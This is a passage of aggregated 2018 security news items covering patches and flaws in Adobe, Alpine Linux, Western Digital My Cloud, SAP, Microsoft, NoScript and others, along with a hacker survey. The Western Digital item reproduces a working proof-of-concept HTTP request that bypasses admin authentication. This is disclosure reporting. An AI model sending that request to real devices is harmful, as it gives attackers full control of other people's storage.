The other bugs have been described by Adobe as out-of-bounds read issues that can lead to information disclosure. These have been assigned an “important” severity rating.

Cyberllum Technologies reported one of the flaws and an anonymous researcher informed Adobe of two flaws via Trend Micro’s Zero Day Initiative (ZDI).

Adobe is not aware of any malicious exploitation and, based on the priority rating assigned to the patches, it does not expect to see exploits any time soon.

The Acrobat and Reader patches come just one week after Adobe released its regular Patch Tuesday updates for September 2018, which resolved 10 vulnerabilities in Flash Player and ColdFusion.

Adobe also released an update for Photoshop CC recently to patch two critical remote code execution vulnerabilities.


Patching Not Enough; Organizations Must Adopt Zero-Trust Practices: Report
20.9.2018 securityweek
Vulnerebility

Hackers Can Gain Network Access Via Social Engineering and Wait for New Zero-Day Exploits to Elevate Their Privilege

At Black Hat 2017, privileged access firm Thycotic surveyed 250 hackers to find out what was easy and what was hard about hacking into networks. At this year's Black Hat, it conducted a similar survey (PDF) among 300 people that consider themselves hackers.

"This year," Thycotic's chief security scientist Joseph Carson told SecurityWeek, "we also wanted to better understand the types of hacker that exist, and their motives for doing what they do."

The respondents self-identified as three groups that could traditionally be described as white hat (70%), grey hat (30%) and black hat (5%). The white hats describe themselves as 'ethical' hackers -- they use their skills and knowledge for good purposes. "There's another category -- which is also ethical -- but where they admit to crossing the line," said Carson. "Their motivation is still to benefit the community; but they admit that some of their practices may actually be illegal."

These tend to be independent researchers, and their work is often unrecognized, because, said Carson, "they tend to report their findings through anonymous channels."

And then there's the black hats -- those who hack for illegal purposes and for personal gain. Only 5% of the respondents admitted to this; but none of them are likely to be full-time criminals. Law enforcement agencies always monitor Black Hat; and 'unemployed' attendees are of particular interest.

The 5% black hats are likely to have legitimate day jobs, and may well have been sent to Black Hat by their employer. It tends to confirm the findings of Malwarebytes this summer -- many companies have one or two employees who moonlight to the dark side.

"Another area we wanted to examine," Carson told SecurityWeek, "is whether staying up to date with the latest software is any protection against hackers." Specifically, Thycotic wanted to know whether current OSs are easily compromised, and asked the question, 'Which OS did you conquer the most in the past 12 months?'.

"What was really surprising," said Carson, "was that Windows 10 -- even though it is the latest and most secure operating system from Microsoft -- is still easily exploitable by hackers. More than one-third of the compromised OSs were Windows 8 and 10. It goes against the common viewpoint that having the latest fully patched system will keep you secure. You have to accept that being patched and up to date is not enough on its own."

The most common method of hacking used by the respondents (56.03%) is social engineering -- it's easier and a lot cheaper than using a zero-day exploit. "Hackers confirmed that 50% of their exploits have uncovered employees re-using passwords that have been already exposed in other data breaches, giving hackers an easy way onto the network," notes the report.

It is clear that users still do not understand the weaknesses in passwords. "A strong password isn't just a lot of jumbled characters," said Carson. "Before it can be considered strong, a password must combine three separate characteristics: it must be complex, unique, and not already compromised elsewhere."

"One thing we did notice," Carson told SecurityWeek, "is that using social engineering doesn't automatically give the hacker privileged access and full network control. Hackers gain access and then wait for the arrival of new zero-day exploits that allow them to elevate their privilege."

Carson pointed out that one such Windows 10 zero-day was disclosed a few weeks ago. "This likely means that over the past couple of weeks many companies that had a simple unprivileged account breach now have the potential for a major compromise occurring within their networks. Social engineering allows attackers to get one foot in the door and then they wait for either misconfiguration or a new vulnerability that they can easily exploit to move to the next level."

These two findings from the hacker respondents -- that patching doesn't prevent hacking, and that most hacks come through social engineering -- are key to Carson's primary conclusion: organizations need to adopt zero-trust practices. "We learnt from last year's study that least privilege and multi-factor authentication make life difficult for hackers," Carson told SecurityWeek.

"We learn this year that 75% of companies have still not adopted this approach despite its effectiveness." Zero trust implies the automatic assumption that an account has been compromised, and requires multi-factor authentication to prove otherwise. This is applied both when moving from the internet to the corporate network, and from one segment of the corporate network to another segment.

"The combination of least privilege and zero trust will make life too difficult for the hackers, and they will likely give up and move on to easier targets," said Carson. Those hackers who have socially engineered a low privilege account and are waiting for a privilege escalation zero day will find they have to break in again before they can do everything.

"Every time the criminal returns to the network he is challenged again and has to use multiple and more sophisticated methods to continue the attack," said Carson. "Combining the principles of least privilege and zero trust is not 100% protection, but it is a major deterrence against everyday hacking."


Adobe issued a critical out-of-band patch to address CVE-2018-12848 Acrobat flaw
20.9.2018 securityaffairs
Vulnerebility

Adobe releases a critical out-of-band patch for CVE-2018-12848 Acrobat flaw, the security updates address a total of 7 vulnerabilities.
Adobe address seven vulnerability in Acrobat DC and Acrobat Reader DC, including one critical vulnerability that could be exploited by attackers to execute arbitrary code.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory.

The flaws affect Acrobat DC and Acrobat Reader DC for Windows and macOS (versions 2018.011.20058 and earlier; Acrobat 2017 and Acrobat Reader 2017 for Windows and macOS (versions 2017.011.30099 and earlier), and Acrobat DC and Acrobat Reader DC for Windows and macOS (2015.006.30448 and earlier).

The security patches have been released just one week after Adobe released its Patch Tuesday updates for September 2018 that addressed 10 vulnerabilities in Flash Player and ColdFusion.

The most severe flaw, tracked as CVE-2018-12848, is a critical out-of-bounds write issue that could allow arbitrary code execution.

The flaw was reported by Omri Herscovici, research team leader at Check Point Software Technologies, the expert also found other 3 vulnerabilities.

The remaining flaws are out-of-bounds read vulnerabilities (CVE-2018-12849, CVE-2018-12850, CVE-2018-12801, CVE-2018-12840, CVE-2018-12778, CVE-2018-12775) that are rated as “important” and could lead to information disclosure.

The CVE-2018-12778 and CVE- 2018-12775 vulnerabilities were anonymously reported via Trend Micro’s Zero Day Initiative, while the CVE-2018-12801 issue was discovered by experts at Cybellum Technologies LTD.

The good news is that Adobe is not aware of any malicious exploitation of the flaw in attacks.


A flaw in Alpine Linux could allow executing arbitrary code
19.9.2018 securityaffairs
Vulnerebility

Security researcher Max Justicz has discovered several flaws in the distribution Alpine Linux, including an arbitrary code execution.
Alpine Linux is an independent, non-commercial, general purpose Linux distribution that is heavily used in containers, including Docker.

Alpine Linux is based on musl libc and busybox, it is a tiny distro and is optimized to manage resources, it is known also for fast boot times.

The experts discovered several vulnerabilities in the APK, the default package manager in Alpine. The most severe bug discovered by Max Justicz could be exploited by an attacker to carry out a man-in-the-middle attack to execute arbitrary code on the user’s machine.

“I found several bugs in apk, the default package manager for Alpine Linux. Alpine is a really lightweight distro that is very commonly used with Docker.” states the analysis published by the researcher.

“The worst of these bugs, the subject of this blog post, allows a network man-in-the-middle (or a malicious package mirror) to execute arbitrary code on the user’s machine. This is especially bad because packages aren’t served over TLS when using the default repositories.”

An attacker could trigger the flaw to target a Docker container based on Alpine and execute arbitrary code, Justicz also published a video PoC of the attack.

The package manager extracts packages, in the form of gzipped tar archives distributed as apks, then check their hashes against the ones in the signed manifest.

If the hashes are different, the package manager attempts to unlink all of the extracted files and directories.

The expert highlighted that the APK’s commit hooks feature could allow an attacker to turn persistent arbitrary file writes into code execution. Justicz discovered that it is possible to hide a malware within the package’s commit_hooks directory that would escape the cleanup and could then be executed as normal.

The expert explained that if an attacker is able to extract a file into /etc/apk/commit_hooks.d/ and have it stay there after the cleanup process, it will be executed before apk exits.

The attacker has to control the downloaded tar file avoiding that the package manager will unlink the payload and its directory during the cleanup process.

The expert explained that the attacker can run MitM to intercept apk’s package requests during Docker image building, then inject them with malicious code before they are passed to the target machines that would unpack and run the malicious code within their Docker container.

The latest Alpine version has addressed the issue, developers are recommended to rebuild their Docker images with the updated Alpine build.


Flaw in Western Digital My Cloud exposes the content to hackers
19.9.2018 securityaffairs
Vulnerebility

An authentication bypass vulnerability in Western Digital My Cloud NAS could allow hackers to access the content of the storage
Researchers at security firm Securify have discovered an elevation of privilege vulnerability in the Western Digital My Cloud platform that could be exploited by attackers to gain admin-level access to the device via an HTTP request.

The flaw, tracked as CVE-2018-17153, would allow an unauthenticated attacker with network access to the device to authenticate as an admin without providing a password.

The attacker could exploit the flaw to run commands, access the stored data, modify/copy them as well as wipe the NAS.

“It was discovered that the Western Digital My Cloud is affected by an authentication bypass vulnerability that allows an unauthenticated user to create an admin session that is tied to her IP address.” reads the report published by Securify.

“By exploiting this issue an unauthenticated attacker can run commands that would normally require admin privileges and gain complete control of the My Cloud device.”

The vulnerability resides in the process of creation of admin sessions implemented by the My Cloud devices that bound to the user’s IP address.

Once the session is created, it is possible to call the authenticated CGI modules by sending the cookie username=admin in the HTTP request. The CGI will check if a valid session is present and bound to the user’s IP address.

An attacker can send a CGI call to the device including a cookie containing the cookie username=admin.

“It was found that it is possible for an unauthenticated attacker to create a valid session without requiring to authenticate.” continues Securify.

“The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when invoked with the parameter flag equal to 1. Subsequent invocation of commands that would normally require admin privileges are now authorized if an attacker sets the username=admin cookie.”

Western Digital My Cloud flaw

The experts published the following PoC code to exploit the issue:

POST /cgi-bin/network_mgr.cgi HTTP/1.1
Host: wdmycloud.local
Content-Type: application/x-www-form-urlencoded
Cookie: username=admin
Content-Length: 23

cmd=cgi_get_ipv6&flag=1
Securify reported the vulnerability to Western Digital in April, but it is still waiting for a response.

In February, experts from Trustwave disclosed two vulnerabilities in Western Digital My Cloud network storage devices that could be exploited by a local attacker to gain root access to the NAS devices.

In April, security experts at Trustwave discovered that Western Digital My Cloud EX2 storage devices were leaking files on a local network by default.


Code Execution in Alpine Linux Impacts Containers
18.9.2018 securityweek
Vulnerebility

A security researcher discovered several vulnerabilities in Alpine Linux, a distribution commonly used with Docker, including one that could allow for arbitrary code execution.

Based on musl and BusyBox, the Alpine Linux distribution has a small size and is heavily used in containers, including Docker, as it provides fast boot times.

APK, the default package manager in Alpine, is impacted by several bugs, security researcher Max Justicz has discovered. The most important of them, the researcher says, could allow a network man-in-the-middle (or a malicious package mirror) to execute arbitrary code on the user’s machine.

“This is especially bad because packages aren’t served over TLS when using the default repositories,” Justicz notes.

An attacker could target a Docker container based on Alpine for code execution, the security researcher reveals. Justicz also published a video detailing such an attack.

The issue, the researcher explains, is that the package manager extracts packages (which are gzipped tar files distributed as apks) before checking their hashes. If the downloaded package’s hash doesn’t match, the APK then attempts to unlink all extracted files and directories.

The APK’s commit hooks feature allows an attacker to turn persistent arbitrary file writes into code execution, as long as the files survive the cleanup process. Thus, the files are executed before apk exits.

For that, the attacker needs to be in control of the downloaded tar file and ensure that the APK won’t be able to unlink the payload and its directory during the cleanup process.

The next step is to make the APK process exit successfully, which requires the return of exit code 0. Normally, it “will return an exit code equal to the number of packages it has failed to install, which is now at least one,” the researcher explains.

However, the value can overflow and, if the number of errors % 256 == 0, the process returns exit code 0, meaning the attack was successful. The researcher was also able to write shellcode to exit(0) directly into memory and have it executed.

The bug likely impacts all those who use Alpine Linux in a production environment. All Alpine-derived container images should be rebuilt to eliminate the issue, the researcher points out.

Alpine Linux, the researcher says, is used by probably hundreds of organizations, all of which could have been affected by this bug.

“Some of those organizations almost certainly have bug bounty programs that would pay generously if a similar bug had been written by one of their own developers. If the goal of a bug bounty program is to help secure an organization, shouldn’t critical bugs in dependencies qualify to some extent?” Justicz concludes.


One year later BlueBorne disclosure, over 2 Billion devices are still vulnerable
17.9.2018 securityaffairs
Vulnerebility

One year after the discovery of the BlueBorne Bluetooth vulnerabilities more than 2 billion devices are still vulnerable to attacks.
In September 2017, experts with Armis Labs devised a new attack technique, dubbed BlueBorne, aimed at mobile, desktop and IoT devices that use Bluetooth. The BlueBorne attack exposes devices to a new remote attack, even without any user interaction and pairing, the unique condition for BlueBorne attacks is that targeted systems must have Bluetooth enabled.

The attack technique leverages on a total of nine vulnerabilities in the Bluetooth design that expose devices to cyber attacks.

A hacker in range of the targeted device can trigger one of the Bluetooth implementation issues for malicious purposes, including remote code execution and man-in-the-middle (MitM) attacks. The attacker only needs to determine the operating system running on the targeted device in order to use the correct exploit.

According to the experts, in order to launch a BlueBorne attack, it is not necessary to trick the victim into clicking on a link or opening a malicious file.

The attack is stealthy and victims will not notice any suspicious activity on their device.

blueborne

Two months later, experts at Armis also revealed that millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, were affected by the Blueborne flaws.

At the time of BlueBorne disclosure, Armis estimated that the security flaw initially affected roughly 5.3 billion Bluetooth-enabled devices.

One year after the company published a new report that warns that roughly one-third of the 5.3 billion impacted devices are still vulnerable to cyber attacks.

“Today, about two-thirds of previously affected devices have received updates that protect them from becoming victims of a BlueBorne attack, but what about the rest? Most of these devices are nearly one billion active Android and iOS devices that are end-of-life or end-of-support and won’t receive critical updates that patch and protect them from a BlueBorne attack.” states the new report published by Armis.

“The other 768 million devices are still running unpatched or unpatchable versions of Linux on a variety of devices from servers and smartwatches to medical devices and industrial equipment.

768 million devices running Linux
734 million devices running Android 5.1 (Lollipop) and earlier
261 million devices running Android 6 (Marshmallow) and earlier
200 million devices running affected versions of Windows
50 million devices running iOS version 9.3.5 and earlier”
It is disconcerting, one billion devices are still running a version of Android that no longer receives security updates, including Android 5.1 Lollipop and earlier (734 million), and Android 6 Marshmallow and earlier (261 million).

It is interesting to note that 768 million Linux devices are running an unpatched or unpatchable version, they include servers, industrial equipment, and IoT systems in many industries.

“An inherent lack of visibility hampers most enterprise security tools today, making it impossible for organizations to know if affected devices connect to their networks,” continues the report published by Armis.

“Whether they’re brought in by employees and contractors, or by guests using enterprise networks for temporary connectivity, these devices can expose enterprises to significant risks.”

Armis notified its findings to vendors five months ago, but the situation is not changed.

“As vulnerabilities and threats are discovered, it can take weeks, months, or more to patch them. Between the time Armis notified affected vendors about BlueBorne and its public disclosure, five months had elapsed. During that time, Armis worked with these vendors to develop fixes that could then be made available to partners or end-users.” added Armis.

Unmanaged and IoT devices grow exponentially in the enterprise dramatically enlarging the attack surface and attracting the interest of hackers focused in the exploitation of Bluetooth as an attack vector.


ICS CERT warns of several flaws Fuji Electric Fuji Electric V-Server
13.9.2018 securityaffairs ICS 
Vulnerebility

Experts discovered several flaws in Fuji Electric V-Server, a tool that connects PCs within the organizations to Industrial Control Systems (ICS).
Experts discovered several vulnerabilities in Fuji Electric V-Server, a tool that connects PCs within the organizations to Industrial Control Systems (ICS) on the corporate network. The ICS-CERT published two advisories to warn of the existence of the flaws that could have a severe impact on a broad range of companies in the critical manufacturing sector.

Fuji Electric V server

The vulnerabilities rated as “high severity” could be exploited by a remote attacker to execute arbitrary code, The kind of issues affecting products that control ICS systems are very dangerous and pose a severe threat to the companies, their security is essential to avoid ugly surprises.

Vulnerabilities affecting products that connect the corporate network to industrial control systems (ICS) can pose a serious threat since that is how many threat actors attempt to make their way onto sensitive systems.

Fuji Electric V-Server devices access to programmable logic controllers (PLCs) on the corporate network via Ethernet. The control of the PLCs is implemented via the Monitouch human-machine interfaces (HMI).

Fuji Electric V server

“Successful exploitation of these vulnerabilities could allow for remote code execution on the device, causing a denial of service condition or information exposure.” reads the advisory published by the ICS CERT.

The list of vulnerabilities includes use-after-free, untrusted pointer dereference, heap-based buffer overflow, out-of-bounds write, integer underflow, out-of-bounds read, and stack-based buffer overflow vulnerabilities that could be exploited by remote attackers to execute arbitrary code and trigger denial-of-service (DoS) condition or information disclosure.

The bad news is that public exploits for some flaws are already available online.

The ICS-CERT also warns of another high severity buffer overflow in V-Server Lite that can lead to a DoS condition or information leakage. The flaw could be triggered by tricking victims into opening specially crafted project files.

The vendor addressed the issues with the release of version 4.0.4.0.

The flaws were reported to the vendor via Trend Micro’s Zero Day Initiative (ZDI) by researchers Steven Seeley from Source Incite and Ariele Caltabiano.

ZDI rated the flaws as “medium severity” with a CVSS score of 6.8, while the most severe issue was the one found by Caltabiano.

“This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Fuji Electric V-Server. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” states the advisory from ZDI.

“The specific flaw exists within the parsing of a VPR file. The issue results from the lack of proper validation of user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to execute code under the context of the V-Server process.”


September 2018 Security Notes address a total of 14 flaws in SAP products
13.9.2018 securityaffairs
Vulnerebility

SAP today just released the September 2018 set of Security Notes that address a total of 14 flaws in its products, including a critical flaw in SAP Business Client.
The September 2018 Security Patch Day includes other 13 Security Notes, three were rated High severity, 9 Medium risk, and 1 Low severity. SAP also released 8 Support Package Notes,

The critical vulnerability in SAP Business Client addressed by SAP was rated as Hot News and received a CVSS score of 9.8. The issue affects the browser control Chromium delivered with SAP Business Client. The vulnerability was first addressed by the company on April 2018 Patch Day, but the Security Note was updated with the last security updates.

Other SAP products addressed with the Security Notes are Business One, BEx Web Java Runtime Export Web Service, HANA, WebDynpro, NetWeaver AS Java, Hybris Commerce, Plant Connectivity, Adaptive Server Enterprise, HCM Fiori “People Profile” (GBX01HR), Mobile Platform, Enterprise Financial Services, and Business One Android application.

“SAP has released the monthly critical patch update for September 2018. This patch update closes 22 SAP Security Notes (14 SAP Security Patch Day Notes and 8 Support Package Notes). 3 of all the patches are updates to the previously released Security Notes.” reads a blog post published by security firm ERPScan.

“4 notes are released after the second Tuesday of the previous month and before the second Tuesday of this month.”

sap security notes sept 2018

Most of the vulnerabilities are Missing Authorization Check, followed by information disclosure, Cross-Site Scripting, and XML External Entity issues.

The most severe flaws in SAP Security Notes are:

2670284: SAP Business One and SAP HANA Installer has an Information Disclosure vulnerability (CVSS Base Score: 8.8 CVE-2018-2458).
2644279: SAP BEx Web Java Runtime Export Web Service has a Missing XML Validation (XXE) vulnerability (CVSS Base Score: 8.8 CVE-2018-2462).
2681207: DOS vulnerability in SAP HANA, Extended Application Services classic model
Product – SAP HANA; Versions – 1.0, 2.0 (CVE-2018-2465)
The 2681207 was discovered by Martin Doyhenard, a researcher at the Onapsis.

“The attack can be carried out by an attacker by sending a large crafted request to a default API or ODATA services present in a HANA XS system abusing the XML parsing failure of one of the libraries which are used by xsengine to parse XML data strings. The malicious request can be remote and unauthenticated, that is, it does not need to be local or come from an authenticated user and no user credentials are needed.” reads the analysis published by Onapsis.


Address Bar Spoofing Flaw Found in Edge, Safari
12.9.2018 securityweek
Vulnerebility

A researcher has discovered an address bar spoofing vulnerability in the Microsoft Edge and Apple Safari web browsers, but a patch is currently only available for the former.

Pakistan-based security researcher Rafay Baloch has identified several SOP bypass and address bar spoofing flaws in the past years. This week, he reported finding another spoofing bug that affects Safari on iOS and Edge.

“During my testing, it was observed that both Edge and Safari browsers allowed JavaScript to update the address bar while the page was still loading,” Baloch explained in a blog post. “Upon requesting data from a non-existent port the address was preserved and hence due to a race condition over a resource requested from a non-existent port combined with the delay induced by setInterval function managed to trigger address bar spoofing. It causes the browser to preserve the address bar and to load the content from the spoofed page. The browser will eventually load the resource, however the delay induced with the setInterval function would be enough to trigger the address bar spoofing.”

Both Microsoft and Apple were notified about the vulnerability in early June. Microsoft, which tracks the flaw as CVE-2018-8383, fixed the issue with its Patch Tuesday updates for August 2018.

“A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services,” Microsoft said in its advisory.

Microsoft has classified the flaw as “important,” but assigned it an “Exploitation More Likely” rating in its exploitability assessment. The company has credited Baloch and several others for reporting this flaw.

In the case of Safari for iOS, Baloch said the browser does not allow users to type information into input boxes while the page is still loading – this would normally prevent the spoofing attack – but the restriction can be bypassed by injecting a keyboard into the fake page.

Apple has yet to release a patch. The company was given 90 days to address the issue before its existence was made public, but it did promise to include a fix in an upcoming update of the browser.

The researcher has published videos showing how the attack works against each browser. Proof-of-concept (PoC) code has also been made available for Microsoft Edge.

 


Zerodium Discloses Flaw That Allows Code Execution in Tor Browser

12.9.2018 securityweek Vulnerebility

Exploit acquisition firm Zerodium has disclosed a NoScript vulnerability that can be exploited to execute arbitrary JavaScript code in the Tor Browser even if the maximum security level is used.

Zerodium disclosed the flaw and provided instructions on how it can be reproduced in a single message posted to Twitter on Monday. The recently released Tor Browser 8 is not affected.

While the tweet describes the issue as a vulnerability or backdoor in the Tor Browser, the flaw actually impacts NoScript, a popular Firefox extension designed to protect users against malicious scripts by allowing JavaScript, Java, and Flash plugins to be executed only on trusted websites. The Tor Browser is based on Firefox and it includes NoScript by default.

Zerodium discloses Tor Browser zero-day exploit

Giorgio Maone, the Italian developer who created NoScript, patched the vulnerability in roughly two hours with the release of version 5.1.8.7. Maone noted that only the “Classic” branch of NoScript 5 is impacted.

The developer explained that the bug exists due to a “work-around for NoScript blocking the in-browser JSON viewer.” He also noted that the vulnerability was introduced in May 2017 with the release of NoScript 5.0.4.

Contacted by SecurityWeek, Tor Project representatives highlighted that this is not a Tor Browser zero-day vulnerability.

“This was a bug in NoScript and not a zero-day exploit of Tor Browser that could circumvent its privacy protections. For bypassing Tor, a real browser exploit would still be needed,” the Tor Project explained.

Chaouki Bekrar, the CEO of Zerodium, told SecurityWeek that the exploit basically circumvents the protection provided by NoScript, even if the Tor Browser is set to the “Safest” security level.

“If a user sets his Tor browser security level to ‘Safest’ to block JavaScript from all websites (e.g. to prevent browser exploits or data gathering), the exploit would allow a website or a hidden service to bypass all NoScript restrictions and execute any JavaScript code despite the maximum security level being used, making it totally ineffective,” Bekrar explained.

Bekrar said his company acquired the vulnerability as a zero-day “many months ago” and shared it with its government customers. He claims Zerodium has acquired – including as part of a time-limited $1 million bug bounty program – what he describes as “high-end Tor exploits.” The company’s customers have allegedly used these exploits to “fight crime and child abuse, and make the world a better and safer place for all.”

Asked if he is concerned that the vulnerability may be exploited for malicious purposes now that it has been disclosed by Zerodium, Bekrar highlighted that version 8 of Tor Browser is not impacted and that it’s highly recommended that users upgrade to the newest release.


SAP Patches Critical Vulnerability in Business Client
12.9.2018 securityweek
Vulnerebility

SAP today released its September 2018 set of patches to address a total of 14 vulnerabilities in its products, including a critical bug in SAP Business Client.

Featuring a CVSS score of 9.8 and rated Hot News, the vulnerability impacts the browser control Chromium delivered with SAP Business Client. The issue was initially addressed on April 2018 Patch Day, but SAP decided to update the Security Note today.

Of the remaining 13 Security Notes included in this month’s Security Patch Day, three were rated High severity, 9 Medium risk, and 1 Low severity.

Impacted SAP products include Business One, BEx Web Java Runtime Export Web Service, HANA, WebDynpro, NetWeaver AS Java, Hybris Commerce, Plant Connectivity, Adaptive Server Enterprise, HCM Fiori "People Profile" (GBX01HR), Mobile Platform, Enterprise Financial Services, and Business One Android application.

SAP also released 8 Support Package Notes this month, for a total of 22 Security Notes, ERPScan, a company that specializes in securing Oracle and SAP products, reveals. 4 of the notes were released over the course of the last month.

Missing Authorization Check was the most encountered type of vulnerability, followed by information disclosure, Cross-Site Scripting, and XML External Entity issues. SAP also addressed implementation flaws, denial of service, SQL injection, buffer overflow, and server side request forgery vulnerabilities.

The most important bugs closed in September (all featuring a CVSS Base Score of 8.8) include a Missing Authorization check vulnerability in SAP ECC Sales Support, an Information Disclosure vulnerability in Business One and HANA Installer, and a Missing XML Validation (XXE) vulnerability in BEx Web Java Runtime Export Web Service.

Another important bug was a denial of service vulnerability in SAP HANA, Extended Application Services Classic Model. Tracked as CVE-2018-2465, the flaw has a CVSS score of 7.5 and is considered High risk.

Discovered by Onapsis researchers, the flaw can be exploited by a remote, unauthenticated attacker through a large crafted request to a default API or to ODATA services present in a HANA XS system abusing the XML parsing, the company says.

“Even though a Denial Of Service attack is the easiest way to exploit this vulnerability, a more complex attack could lead to a potential remote code execution (RCE), that could lead to even worse scenarios for the affected users,” Sebastian Bortnik, Director Of Research for Onapsis, told SecurityWeek in an emailed comment.

A Cross-Site Scripting issue in NetWeaver AS Java Logon Application (versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40 and 7.50) can lead to defacements, user credentials compromises, or user impersonation, Onapsis, which also focuses on securing Oracle and SAP applications, explains.


Microsoft Patches Windows Zero-Day Disclosed via Twitter
12.9.2018 securityweek
Vulnerebility

Microsoft’s Patch Tuesday updates for September 2018 address over 60 vulnerabilities, including a zero-day disclosed by a researcher and exploited shortly after by a threat actor.

The actively exploited flaw, identified as CVE-2018-8440, was disclosed on August 27 by a researcher who uses the online moniker SandboxEscaper. The security hole was not reported to Microsoft before its existence was disclosed via Twitter as SandboxEscaper was apparently frustrated with the company’s vulnerability reporting process.

The privilege escalation vulnerability, which according to Microsoft exists when Windows improperly handles calls to the Advanced Local Procedure Call (ALPC) interface of the Task Scheduler, can be exploited by an authenticated attacker to execute code with elevated privileges.

ESET discovered that a newly uncovered group it tracks as PowerPool used a modified version of the public exploit in an attempt to deliver malware to a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines and Poland.

Three other vulnerabilities patched by Microsoft on Tuesday were made public before fixes were released, but none of them have been exploited in the wild.

One of them, tracked as CVE-2018-8475 and rated critical, allows an attacker to execute arbitrary code by getting the targeted Windows user to execute a specially crafted image file.

“Microsoft provides no information on where this is public, but given the severity of the issue and the relative ease of exploitation, expect this one to find its way into exploit kits quickly,” Trend Micro’s Zero Day Initiative (ZDI) explained in a blog post discussing Patch Tuesday updates.

Another publicly disclosed critical flaw is CVE-2018-8457, which affects Microsoft’s web browsers and which can be exploited to execute arbitrary code by getting the target to access a malicious website.

The last publicly disclosed flaw is an “important” denial-of-service (DoS) issue affecting .NET Core, ASP.NET Core and the System.IO.Pipelines component.

A total of 17 vulnerabilities have been rated “critical” by Microsoft, including ones affecting Windows, web browsers, and the .NET framework.

Two interesting flaws are CVE-2018-0965 and CVE-2018-8439. They both affect Windows Hyper-V and they both allow an attacker with access to a guest virtual machine to execute code on the host operating system.

Adobe and SAP have also released Patch Tuesday updates. Adobe fixed 10 vulnerabilities in Flash Player and ColdFusion, while SAP addressed a total of 14 flaws across several of its products.


Adobe Patch Tuesday for September 2018 fixes 10 flaws in Flash Player and ColdFusion
12.9.2018 securityaffairs
Vulnerebility

Adobe Patch Tuesday updates for September 2018 address a total of 10 vulnerabilities in Flash Player and ColdFusion, the good news is that none is severe.
The Adobe Patch Tuesday updates for September 2018 addressed an important privilege escalation vulnerability (CVE-2018-15967) in Adobe Flash Player 30.0.0.154 and earlier versions. The successful exploitation of the flaw could lead to information disclosure.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address an important vulnerability in Adobe Flash Player 30.0.0.154 and earlier versions. Successful exploitation could lead to information disclosure.” reads the security advisory published by Adobe.

Version 31.0.0.108 addresses the CVE-2018-15967 flaw, the issue was rated as “important” with a priority rating of 2, which indicates that the likelihood of being exploited in attacks in the wild is very low.

The remaining nine vulnerabilities affected Adobe ColdFusion 6 of which are rated as critical (4 Deserialization of untrusted data, 1 Unrestricted file upload, and 1 issue related to the use of a component with a known vulnerability).

The security flaws impact ColdFusion 11, 2016 and 2018, and Adobe has issued update instructions for each version.

The critical flaws could be exploited for arbitrary code execution and arbitrary file overwrite, while an unrestricted file upload bug that can lead to code execution.

Other two flaws in ColdFusion have been rated “important,” an attacker could exploit them to create arbitrary folders and to obtain directory listings.

Adobe ColdFusion is also affected by a moderate severity information disclosure vulnerability that was introduced by the use of a component with a known flaw.


Trend Micro Apps removed from Mac App Store after being caught exfiltrating user data
11.9.2018 securityaffairs
Vulnerebility

Several anti-malware apps developed by Trend Micro have been removed from the Mac App Store because they were harvesting users’ browser history and other info.
Several anti-malware apps developed by Trend Micro, including Dr Cleaner, Dr. Unarchiver, Dr Antivirus, and App Uninstall, have been removed from the Mac App Store after researchers discovered they were harvesting users’ browser history and other information.

At the time of writing, it is not clear if Trend Micro removed the apps itself following complaints or if Apple removed them due to their activities.

The security researcher that handle the Twitter account Privacy First first reported the alleged unethical behavior and published a video that shows how the app harvest users ‘data.

Former NSA white hat hacker Patrick Wardle reported last week that Trend Micro apps were also collecting users’ personal data including their browsing history and then uploaded that data in a password-protected archive to a server.

“Moreover, the network proxy monitor (Charles Proxy) captures a connection attempt from Adware Doctor to adscan.yelabapp.com:” “By editing the system’s /etc/hosts file we can redirect this request to a server we control and can capture what Adware Doctor is trying to upload. And what do you think that might be? If you guessed the history.zip file you would be correct!” wrote Wardle.


“The uploaded ‘history.zip’ archive is password protected:”

Wardle highlighted that the applications he analyzed were signed off by Trend Micro and approved by Apple.

“From a security and privacy point of view, one of the main benefits of installing applications from the official Mac App Store is that such applications are sandboxed,” Wardle added.

“The other benefit is that Apple supposedly vets all submitted applications – but as we’ve clearly shown here, they (sometimes?) do a miserable job.)”

Trend Micro has admitted that browser histories were collected as part of the code’s installation. In a statement today, the biz said:

“Dr Cleaner, Dr Cleaner Pro, Dr Antivirus, Dr Unarchiver, Dr Battery, and Duplicate Finder collected and uploaded a small snapshot of the browser history on a one-time basis, covering the 24 hours prior to installation. This was a one-time data collection, done for security purposes (to analyze whether a user had recently encountered adware or other threats, and thus to improve the product & service).” reads the official reply published by the company.

“The data collected was explicitly identified to the customer in the data collection policy and is highlighted to the user during the install. The browser history data was uploaded to a US-based server hosted by AWS and managed/controlled by Trend Micro.”

Trend announced it is removing the suspicious feature from its application.

Just yesterday I reported the news of a group of security researchers behind the Guardian mobile firewall app that revealed that a growing number of iOS apps currently collect location data, WiFi network IDs and other data, from iPhone users and sell them to advertising companies.

Let me immediately highlight that these iOS apps collect data by asking users for permission to do it, but lack to inform users that gathered information are shared with third-party advertising and marketing companies.

The experts have observed that all these apps have embedded tracking codes provided by advertising and marketing firms.

“The GuardianApp team has discovered that a growing number of iOS apps have been used to covertly collect precise location histories from tens of millions of mobile devices, using packaged code provided by data monetization firms. In many cases, the packaged tracking code may run at all times, constantly sending user GPS coordinates and other information.” states the Guardian app research team.

“In order to gain initial access to precise data from the mobile device’s GPS sensors, the apps usually present a plausible justification relevant to the app in the Location Services permission dialog, often with little or no mention of the fact that location data will be shared with third-party entities for purposes unrelated to app operation.”


VPN Firms Release New Patches for Privilege Escalation Flaw
10.9.2018 securityweek
Vulnerebility

